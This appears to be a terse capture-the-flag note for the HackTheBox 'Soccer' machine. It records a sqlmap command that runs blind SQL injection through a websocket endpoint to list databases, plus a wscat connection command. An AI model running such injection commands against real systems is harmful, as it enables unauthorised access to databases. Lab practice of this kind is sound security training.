websocket

sqlmap -u 'ws://soc-player.soccer.htb:9091/' --data '{"id":"*"}' --batch --technique=B --risk 3 --level 5 --dbs --thre
ads 10

wscat tool

wscat -c soc-player.soccer.htb:9091/ws
> [Input form somewhere. maybe through BURP] #soccerhtb

Last updated